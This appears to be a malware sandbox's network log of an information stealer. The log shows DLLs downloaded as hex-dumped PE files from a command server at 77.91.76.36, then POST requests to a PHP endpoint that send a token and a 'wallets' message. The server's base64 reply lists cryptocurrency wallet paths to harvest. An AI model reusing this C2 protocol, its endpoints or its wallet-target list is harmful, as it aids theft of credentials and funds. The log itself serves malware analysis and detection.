00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B
Dec 24, 2023 10:45:03.153676033 CET	91	OUT	GET /f059ec3d7eb90876/msvcp140.dll HTTP/1.1 Host: 77.91.76.36 Cache-Control: no-cache
Dec 24, 2023 10:45:03.544996977 CET	1286	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 24 Dec 2023 09:45:03 GMT Content-Type: application/x-msdos-program Content-Length: 450024 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "6dde8-5e7e950876500" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
Dec 24, 2023 10:45:03.915719986 CET	87	OUT	GET /f059ec3d7eb90876/nss3.dll HTTP/1.1 Host: 77.91.76.36 Cache-Control: no-cache
Dec 24, 2023 10:45:04.306502104 CET	1286	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 24 Dec 2023 09:45:04 GMT Content-Type: application/x-msdos-program Content-Length: 2046288 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "1f3950-5e7e950876500" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
Dec 24, 2023 10:45:05.173965931 CET	91	OUT	GET /f059ec3d7eb90876/softokn3.dll HTTP/1.1 Host: 77.91.76.36 Cache-Control: no-cache
Dec 24, 2023 10:45:05.563266039 CET	1286	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 24 Dec 2023 09:45:05 GMT Content-Type: application/x-msdos-program Content-Length: 257872 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "3ef50-5e7e950876500" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data\|@.00cfg@@.rsrc@@.reloc56@B
Dec 24, 2023 10:45:05.819092035 CET	95	OUT	GET /f059ec3d7eb90876/vcruntime140.dll HTTP/1.1 Host: 77.91.76.36 Cache-Control: no-cache
Dec 24, 2023 10:45:06.209992886 CET	1286	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 24 Dec 2023 09:45:06 GMT Content-Type: application/x-msdos-program Content-Length: 80880 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "13bf0-5e7e950876500" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL\|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B
Dec 24, 2023 10:45:06.902631998 CET	199	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KEHJKJDGCGDAKFHIDBGC Host: 77.91.76.36 Content-Length: 1067 Connection: Keep-Alive Cache-Control: no-cache
Dec 24, 2023 10:45:07.754095078 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 24 Dec 2023 09:45:07 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 24, 2023 10:45:07.896717072 CET	465	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KEHJKJDGCGDAKFHIDBGC Host: 77.91.76.36 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4b 45 48 4a 4b 4a 44 47 43 47 44 41 4b 46 48 49 44 42 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 63 62 35 66 34 35 36 36 64 65 66 66 66 31 39 33 63 66 61 32 31 39 36 65 32 64 33 35 31 61 36 30 63 35 66 63 31 32 37 31 30 34 35 34 30 34 31 63 39 62 32 65 62 62 64 37 34 34 63 39 65 34 33 36 34 62 64 35 39 66 61 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 48 4a 4b 4a 44 47 43 47 44 41 4b 46 48 49 44 42 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 48 4a 4b 4a 44 47 43 47 44 41 4b 46 48 49 44 42 47 43 2d 2d 0d 0a Data Ascii: ------KEHJKJDGCGDAKFHIDBGCContent-Disposition: form-data; name="token"1cb5f4566defff193cfa2196e2d351a60c5fc12710454041c9b2ebbd744c9e4364bd59fa------KEHJKJDGCGDAKFHIDBGCContent-Disposition: form-data; name="message"wallets------KEHJKJDGCGDAKFHIDBGC--
Dec 24, 2023 10:45:08.290999889 CET	1286	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 24 Dec 2023 09:45:08 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 1576 Connection: keep-alive Vary: Accept-Encoding Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 46 78 43 61 58 52 6a 62 32 6c 75 58 48 64 68 62 47 78 6c 64 48 4e 63 66 48 64 68 62 47 78 6c 64 43 35 6b 59 58 52 38 4d 58 78 43 61 58 52 6a 62 32 6c 75 49 45 4e 76 63 6d 55 67 54 32 78 6b 66 46 78 43 61 58 52 6a 62 32 6c 75 58 48 77 71 64 32 46 73 62 47 56 30 4b 69 35 6b 59 58 52 38 4d 48 78 45 62 32 64 6c 59 32 39 70 62 6e 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 58 46 4a 68 64 6d 56 75 58 48 77 71 64 32 46 73 62 47 56 30 4b 69 35 6b 59 58 52 38 4d 48 78 45 59 57 56 6b 59 57 78 31 63 79 42 4e 59 57 6c 75 62 6d 56 30 66 46 78 45 59 57 56 6b 59 57 78 31 63 79 42 4e 59 57 6c 75 62 6d 56 30 58 48 64 68 62 47 78 6c 64 48 4e 63 66 48 4e 6f 5a 53 6f 75 63 33 46 73 61 58 52 6c 66 44 42 38 51 6d 78 76 59 32 74 7a 64 48 4a 6c 59 57 30 67 52 33 4a 6c 5a 57 35 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 58 45 64 79 5a 57 56 75 58 48 64 68 62 47 78 6c 64 48 4e 63 66 43 6f 75 4b 6e 77 78 66 46 64 68 63 32 46 69 61 53 42 58 59 57 78 73 5a 58 52 38 58 46 64 68 62 47 78 6c 64 46 64 68 63 32 46 69 61 56 78 44 62 47 6c 6c 62 6e 52 63 56 32 46 73 62 47 56 30 63 31 78 38 4b 69 35 71 63 32 39 75 66 44 42 38 52 58 52 6f 5a 58 4a 6c 64 57 31 38 58 45 56 30 61 47 56 79 5a 58 56 74 58 48 78 72 5a 58 6c 7a 64 47 39 79 5a 58 77 77 66 45 56 73 5a 57 4e 30 63 6e 56 74 66 46 78 46 62 47 56 6a 64 48 4a 31 62 56 78 33 59 57 78 73 5a 58 52 7a 58 48 77 71 4c 69 70 38 4d 48 78 46 62 47 56 6a 64 48 4a 31 62 55 78 55 51 33 78 63 52 57 78 6c 59 33 52 79 64 57 30 74 54 46 52 44 58 48 64 68 62 47 78 6c 64 48 4e 63 66 43 6f 75 4b 6e 77 77 66 45 56 34 62 32 52 31 63 33 78 63 52 58 68 76 5a 48 56 7a 58 48 78 6c 65 47 39 6b 64 58 4d 75 59 32 39 75 5a 69 35 71 63 32 39 75 66 44 42 38 52 58 68 76 5a 48 56 7a 66 46 78 46 65 47 39 6b 64 58 4e 63 66 48 64 70 62 6d 52 76 64 79 31 7a 64 47 46 30 5a 53 35 71 63 32 39 75 66 44 42 38 52 58 68 76 5a 48 56 7a 66 46 78 46 65 47 39 6b 64 58 4e 63 5a 58 68 76 5a 48 56 7a 4c 6e 64 68 62 47 78 6c 64 46 78 38 63 47 46 7a 63 33 42 6f 63 6d 46 7a 5a 53 35 71 63 32 39 75 66 44 42 38 52 58 68 76 5a 48 56 7a 66 46 78 46 65 47 39 6b 64 58 4e 63 5a 58 68 76 5a 48 56 7a 4c 6e 64 68 62 47 78 6c 64 46 78 38 63 32 56 6c 5a 43 35 7a 5a 57 4e 76 66 44 42 38 52 58 68 76 5a 48 56 7a 66 46 78 46 65 47 39 6b 64 58 4e 63 5a 58 68 76 5a 48 56 7a 4c 6e 64 68 62 47 78 6c 64 46 78 38 61 57 35 6d 62 79 35 7a 5a 57 4e 76 66 44 42 38 52 57 78 6c 59 33 52 79 62 32 34 67 51 32 46 7a 61 48 78 63 52 57 78 6c 59 33 52 79 62 32 35 44 59 58 4e 6f 58 48 64 68 62 47 78 6c 64 48 4e 63 66 43 6f 75 4b 6e 77 77 66 45 31 31 62 48 52 70 52 47 39 6e 5a 58 78 63 54 58 56 73 64 47 6c 45 62 32 64 6c 58 48 78 74 64 57 78 30 61 57 52 76 5a 32 55 75 64 32 46 73 62 47 56 30 66 44 42 38 53 6d 46 34 65 43 42 45 5a 58 4e 72 64 47 39 77 49 43 68 76 62 47 51 70 66 46 78 71 59 58 68 34 58 45 78 76 59 32 46 73 49 46 4e 30 62 33 4a 68 5a 32 56 63 66 